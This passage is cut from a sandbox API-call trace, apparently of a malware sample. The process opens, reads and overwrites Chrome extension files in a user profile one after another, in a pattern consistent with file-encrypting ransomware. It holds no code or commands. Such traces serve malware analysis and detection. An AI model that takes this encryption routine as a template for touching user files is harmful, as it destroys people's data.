nNumberOfBytesToRead=0xf9, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb308*, lpNumberOfBytesRead=0x331f2bc*=0xf9, lpOverlapped=0x0) returned 1 [0164.858] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0164.858] WriteFile (in: hFile=0x1dc, lpBuffer=0x3cfe118*, nNumberOfBytesToWrite=0x681, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfe118*, lpNumberOfBytesWritten=0x331f2d0*=0x681, lpOverlapped=0x0) returned 1 [0164.858] CloseHandle (hObject=0x1dc) returned 1 [0164.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0164.860] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.860] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x10c [0164.860] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.860] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.860] ReleaseMutex (hMutex=0x168) returned 1 [0164.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.860] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ef2258, nNumberOfBytesToRead=0x10c, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2258*, lpNumberOfBytesRead=0x331f2bc*=0x10c, lpOverlapped=0x0) returned 1 [0164.863] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0164.863] WriteFile (in: hFile=0x1dc, lpBuffer=0x3cfe118*, nNumberOfBytesToWrite=0x694, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfe118*, lpNumberOfBytesWritten=0x331f2d0*=0x694, lpOverlapped=0x0) returned 1 [0164.863] CloseHandle (hObject=0x1dc) returned 1 [0164.863] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0164.864] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.864] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xfd [0164.865] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.865] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.865] ReleaseMutex (hMutex=0x168) returned 1 [0164.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.865] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eeb308, nNumberOfBytesToRead=0xfd, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb308*, lpNumberOfBytesRead=0x331f2bc*=0xfd, lpOverlapped=0x0) returned 1 [0164.869] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0164.869] WriteFile (in: hFile=0x1dc, lpBuffer=0x3cfe118*, nNumberOfBytesToWrite=0x685, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfe118*, lpNumberOfBytesWritten=0x331f2d0*=0x685, lpOverlapped=0x0) returned 1 [0164.869] CloseHandle (hObject=0x1dc) returned 1 [0164.869] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0164.870] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.870] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x11e [0164.871] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.871] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.871] ReleaseMutex (hMutex=0x168) returned 1 [0164.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.871] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ecd5c8, nNumberOfBytesToRead=0x11e, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ecd5c8*, lpNumberOfBytesRead=0x331f2bc*=0x11e, lpOverlapped=0x0) returned 1 [0164.872] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0164.872] WriteFile (in: hFile=0x1dc, lpBuffer=0x3cfe118*, nNumberOfBytesToWrite=0x6a6, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfe118*, lpNumberOfBytesWritten=0x331f2d0*=0x6a6, lpOverlapped=0x0) returned 1 [0164.873] CloseHandle (hObject=0x1dc) returned 1 [0164.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0164.874] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0164.874] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xe8 [0164.874] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.120] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.126] ReleaseMutex (hMutex=0x168) returned 1 [0165.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.153] ReadFile (in: hFile=0x1dc, lpBuffer=0x2697308, nNumberOfBytesToRead=0xe8, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697308*, lpNumberOfBytesRead=0x331f2bc*=0xe8, lpOverlapped=0x0) returned 1 [0165.155] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0165.155] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x331f2d0*=0x670, lpOverlapped=0x0) returned 1 [0165.156] CloseHandle (hObject=0x1dc) returned 1 [0165.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.546] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.546] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3a258 [0165.546] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.547] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.547] ReleaseMutex (hMutex=0x168) returned 1 [0165.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_route_details.js", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0165.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_route_details.js", cchWideChar=21, lpMultiByteStr=0x1f88c44, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cast_route_details.js", lpUsedDefaultChar=0x0) returned 21 [0165.547] ReadFile (in: hFile=0x130, lpBuffer=0x286da88, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0165.549] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x39258 [0165.549] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.550] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x39258 [0165.551] WriteFile (in: hFile=0x130, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0165.551] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0165.551] WriteFile (in: hFile=0x130, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0165.551] CloseHandle (hObject=0x130) returned 1 [0165.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.553] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.553] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3b [0165.553] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.553] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.553] ReleaseMutex (hMutex=0x168) returned 1 [0165.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="offers.html", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0165.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="offers.html", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="offers.html", lpUsedDefaultChar=0x0) returned 11 [0165.554] ReadFile (in: hFile=0x130, lpBuffer=0x1f96d58, nNumberOfBytesToRead=0x3b, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f96d58*, lpNumberOfBytesRead=0x331f2bc*=0x3b, lpOverlapped=0x0) returned 1 [0165.556] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0165.556] WriteFile (in: hFile=0x130, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c3, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x331f2d0*=0x5c3, lpOverlapped=0x0) returned 1 [0165.557] CloseHandle (hObject=0x130) returned 1 [0165.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.558] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.558] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x8f8 [0165.558] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.558] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.558] ReleaseMutex (hMutex=0x168) returned 1 [0165.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="manifest.json", lpUsedDefaultChar=0x0) returned 13 [0165.558] ReadFile (in: hFile=0x130, lpBuffer=0x286daa8, nNumberOfBytesToRead=0x8f8, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesRead=0x331f2bc*=0x8f8, lpOverlapped=0x0) returned 1 [0165.561] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0165.561] WriteFile (in: hFile=0x130, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f2d0*=0xe80, lpOverlapped=0x0) returned 1 [0165.561] CloseHandle (hObject=0x130) returned 1 [0165.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.571] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.571] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4b63 [0165.571] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.571] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.571] ReleaseMutex (hMutex=0x168) returned 1 [0165.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.571] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.582] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3b63 [0165.582] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.583] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3b63 [0165.583] WriteFile (in: hFile=0x130, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0165.584] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0165.584] WriteFile (in: hFile=0x130, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0165.585] CloseHandle (hObject=0x130) returned 1 [0165.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.586] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.586] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x404b [0165.586] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.586] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.587] ReleaseMutex (hMutex=0x168) returned 1 [0165.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.587] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.591] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x304b [0165.591] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.592] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x304b [0165.593] WriteFile (in: hFile=0x130, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, 